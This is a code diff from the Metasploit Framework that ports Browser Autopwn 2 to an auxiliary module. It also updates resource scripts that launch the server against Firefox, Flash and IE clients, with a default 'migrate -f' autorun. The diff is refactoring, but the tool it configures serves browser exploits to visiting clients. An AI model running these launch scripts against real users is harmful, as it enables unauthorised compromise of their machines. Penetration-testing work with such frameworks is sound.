Port BAPv2 to Auxiliary

lib/msf/core/exploit/remote/browser_exploit_server.rb

@@ -12,6 +12,7 @@ require 'msf/core/exploit/remote/browser_profile_manager'
 #
 # The BrowserExploitServer mixin provides methods to do common tasks seen in modern browser
 # exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
+# Note that this mixin is designed to be compatible with both Exploit and Auxilliary modules.
 # Wiki documentations about this mixin can be found here:
 # https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer
 # https://github.com/rapid7/metasploit-framework/wiki/Information-About-Unmet-Browser-Exploit-Requirements
@@ -80,15 +81,15 @@ module Msf
     def initialize(info={})
       super
 
-      # The mixin keeps 'target' so module doesn't lose it.
+      # The mixin keeps 'target' handy so module doesn't lose it.
-      @target = target
+      @target = self.respond_to?(:target) ? target : nil
 
       # Requirements are conditions that the browser must have in order to be exploited.
       @requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
 
-      @info_receiver_page     = rand_text_alpha(5)
+      @info_receiver_page     = Rex::Text.rand_text_alpha(5)
-      @exploit_receiver_page  = rand_text_alpha(6)
+      @exploit_receiver_page  = Rex::Text.rand_text_alpha(6)
-      @noscript_receiver_page = rand_text_alpha(7)
+      @noscript_receiver_page = Rex::Text.rand_text_alpha(7)
 
       register_options(
       [
@@ -190,6 +191,7 @@ module Msf
     #
     # @param profile [Hash] The profile to check
     def try_set_target(profile)
+      return unless self.respond_to?(:targets)
       match_counts        = []
       target_requirements = {}
       targets.each do |t|

modules/auxiliary/server/browser_autopwn2.rb

@@ -4,9 +4,7 @@
 ##
 
 require 'msf/core'
-
+class Metasploit3 < Msf::Auxiliary
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserAutopwnv2
 
@@ -49,16 +47,25 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
-      'Targets'        => [ [ 'Automatic', {} ] ],
-      'Platform'       => %w{ java linux osx solaris win android firefox },
-      'Privileged'     => false,
       'DisclosureDate' => "Jul 5 2015",
-      'Targets'        => [ [ 'Automatic', {} ] ],
       'References'     =>
         [
           [ 'URL', 'https://github.com/rapid7/metasploit-framework/wiki' ]
         ],
-      'DefaultTarget'  => 0))
+      'Actions'     =>
+        [
+          [ 'WebServer', {
+            'Description' => 'Start a bunch of modules and direct clients to appropriate exploits'
+          } ],
+        ],
+      'PassiveActions' =>
+        [ 'WebServer' ],
+      'DefaultOptions' => {
+          # We know that most of these exploits will crash the browser, so
+          # set the default to run migrate right away if possible.
+          "InitialAutoRunScript" => "migrate -f",
+        },
+      'DefaultAction'  => 'WebServer'))
 
 
     register_advanced_options(get_advanced_options, self.class)
@@ -77,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
   end
 
-  def setup
-    if datastore['PAYLOAD'] != 'windows/meterpreter/reverse_tcp'
-      msg = "\"set payload\" is disabled: Instead of using \"set payload\", please set PAYLOAD_[platform] "
-      msg << "to set a platform-specific payload, and set PAYLOAD_[platform]_LPORT "
-      msg << "to set a platform-specific LPORT."
-      raise RuntimeError, msg
-    end
-    super
-  end
-
   def get_advanced_options
     opts = []
     DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
@@ -102,5 +99,8 @@ class Metasploit3 < Msf::Exploit::Remote
     send_exploit_html(cli, serve)
   end
 
+  def run
+    exploit
+  end
 
 end

scripts/resource/bap_all.rc

@@ -0,0 +1,6 @@
+<ruby>
+run_single("use auxiliary/server/browser_autopwn2")
+run_single("set RealList true")
+run_single("set VERBOSE true")
+run_single("run")
+</ruby>

scripts/resource/bap_dryrun_only.rc

@@ -2,7 +2,7 @@
 print_status("Starting BAP...")
 print_status("Exploits will not be actually served, but you will know which ones the clients might be vulnerable to.")
 print_status("You can do 'notes -t baps.clicks' in msfconsole to track clicks and client-specific exploit info.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set RealList true")
 run_single("set MaxSessions 0")
 

scripts/resource/bap_firefox_only.rc

@@ -1,7 +1,7 @@
 <ruby>
 print_status("Starting Browser Autopwn with Firefox-only BrowserExploitServer-based exploits.")
 print_status("Older Firefox exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include (mozilla_firefox|firefox)_")
 run_single("set RealList true")
 run_single("run")

scripts/resource/bap_flash_only.rc

@@ -1,7 +1,7 @@
 <ruby>
 print_status("Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits.")
 print_status("Older Adobe Flash exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include adobe_flash")
 run_single("set RealList true")
 run_single("run")

scripts/resource/bap_ie_only.rc

@@ -1,7 +1,7 @@
 <ruby>
 print_status("Starting Browser Autopwn with IE-only BrowserExploitServer-based exploits.")
 print_status("Older IE exploits don't use BES, therefore will not be loaded.")
-run_single("use exploit/multi/browser/autopwn")
+run_single("use auxiliary/server/browser_autopwn2")
 run_single("set Include (ms\\\\d\\\\d_\\\\d+|ie)_")
 run_single("set RealList true")
 run_single("run")